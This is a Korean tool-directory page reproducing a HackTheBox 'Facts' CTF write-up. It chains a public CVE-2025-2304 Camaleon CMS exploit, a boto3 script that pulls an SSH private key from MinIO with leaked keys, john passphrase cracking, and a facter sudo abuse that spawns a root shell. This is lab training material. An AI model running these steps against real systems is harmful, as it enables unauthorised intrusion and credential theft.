Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
HTB-Facts-Writeup — HackTheBox Facts 머신 라이트업 — CVE-2025-2304, MinIO S3 열거, SSH 키 크래킹 및 facter 권한 상승. | Kitploit
도구/GitHubGitHub/karimelsheikh1/htb-facts-writeup
Password CrackingPrivilege EscalationReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingCloud SecurityLearning & Education
GitHubkarimelsheikh1/htb-facts-writeup
105개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

HTB-Facts-Writeup

HackTheBox Facts 머신 라이트업 — CVE-2025-2304, MinIO S3 열거, SSH 키 크래킹 및 facter 권한 상승.

저장소 보기

HackTheBox — Facts 머신 해설

HackTheBox Difficulty OS

머신 정보

필드세부 정보
이름Facts
OSLinux
난이도쉬움
출시시즌 10
은퇴아니오

공격 체인 개요

Recon → Web Enumeration → CVE-2025-2304 (Mass Assignment) → S3/MinIO Credential Leak → SSH Key Extraction → Passphrase Cracking → User Shell → facter Sudo Abuse → Root

사용된 도구

도구용도
Nmap포트 스캔 및 서비스 탐지
Feroxbuster웹 디렉터리 열거
CVE-2025-2304 PoCCamaleon CMS 권한 상승
boto3 (Python)MinIO/S3 열거 및 파일 다운로드
ssh2johnSSH 키를 크랙 가능한 해시로 변환
John the RipperSSH 키 패스프레이즈 크랙
factersudo 잘못된 설정을 통한 권한 상승

정찰

포트 스캔

sudo nmap -p- --min-rate 5000 -T4 <TARGET_IP> -oN ports.nmap
sudo nmap -sV -sC -p 22,80,54321 <TARGET_IP>

결과:

22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu
80/tcp    open  http    nginx 1.26.3 (Camaleon CMS)
54321/tcp open  http    MinIO S3 Server
echo "<TARGET_IP> facts.htb" | sudo tee -a /etc/hosts

웹 열거

feroxbuster -u http://facts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 40
curl -s http://facts.htb/robots.txt
curl -s http://facts.htb/sitemap.xml

주요 발견사항:

  • CMS 식별: Camaleon CMS 2.9.0
  • 관리자 패널: http://facts.htb/admin/login
  • 등록 페이지: http://facts.htb/admin/register

초기 접근

1단계 — 계정 등록

http://facts.htb/admin/register에 접속하여 계정을 생성합니다. 캡차가 있으므로 브라우저를 통해 등록하세요.

2단계 — CVE-2025-2304 (대량 할당 권한 상승)

updated_ajax 엔드포인트는 permit!을 사용하여 role을 포함한 모든 매개변수 업데이트를 허용합니다.

git clone https://github.com/Alien0ne/CVE-2025-2304
cd CVE-2025-2304
python3 exploit.py -u http://facts.htb -U <username> -P <password> -e

출력:

[+] Login confirmed
    Current User Role: client
[+] Updated User Role: admin
[+] Extracting S3 Credentials
    s3 access key: AKIAA5CA83CCFE35CD69
    s3 secret key: zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n
    s3 endpoint:   http://localhost:54321

클라우드 열거 — MinIO S3

포트 54321은 MinIO S3 호환 서버를 실행합니다. 유출된 자격 증명을 사용합니다:

import boto3
from botocore.client import Config

s3 = boto3.client(
    's3',
    endpoint_url='http://facts.htb:54321',
    aws_access_key_id='AKIAA5CA83CCFE35CD69',
    aws_secret_access_key='zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n',
    config=Config(signature_version='s3v4'),
    region_name='us-east-1'
)

paginator = s3.get_paginator('list_objects_v2')
for page in paginator.paginate(Bucket='internal'):
    for o in page.get('Contents', []):
        if 'info-etags' not in o['Key']:
            print(o['Key'])
            s3.download_file('internal', o['Key'], '/tmp/' + o['Key'].replace('/', '_'))

찾은 주요 파일:

.ssh/authorized_keys
.ssh/id_ed25519        ← SSH 개인 키
.profile
.bashrc

SSH 키 크랙

chmod 600 /tmp/.ssh_id_ed25519
ssh2john /tmp/.ssh_id_ed25519 > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

크랙된 패스프레이즈: dragonballz


사용자 셸

ssh -i /tmp/.ssh_id_ed25519 [email protected]
# Enter passphrase: dragonballz
cat /home/william/user.txt

권한 상승

열거

sudo -l
(ALL) NOPASSWD: /usr/bin/facter

익스플로잇 — facter 커스텀 팩트 (Ruby 코드 실행)

Facter는 커스텀 팩트를 Ruby 스크립트로 로드합니다. 루트 권한으로 암호 없이 실행할 수 있으므로 임의의 Ruby 코드를 주입합니다:

mkdir -p /tmp/facts
cat > /tmp/facts/pwn.rb << 'EOF'
Facter.add(:pwn) do
  setcode do
    exec("/bin/bash -p")
  end
end
EOF

sudo facter --custom-dir=/tmp/facts pwn

루트 셸 획득!

whoami   # root
cat /root/root.txt

주요 시사점

  • 대량 할당 취약점은 입력이 적절히 필터링되지 않을 때 권한 상승을 허용합니다
  • 잘못 구성된 S3/MinIO 버킷은 SSH 개인 키를 포함한 민감한 파일을 노출할 수 있습니다
  • SSH 키의 약한 패스프레이즈는 rockyou 같은 일반적인 단어 목록으로 크랙될 수 있습니다
  • NOPASSWD sudo 바이너리는 항상 남용 가능성을 조사해야 합니다
  • 작은 잘못된 설정을 연쇄적으로 연결하면 전체 시스템을 장악할 수 있습니다

참고 자료

  • CVE-2025-2304 — Camaleon CMS 대량 할당
  • GTFOBins — facter
  • HackTheBox

이 해설은 교육 목적으로만 제공됩니다. 항상 자신이 소유하거나 명시적 테스트 허가를 받은 시스템에서만 보안 테스트를 수행하세요.

도구 다운로드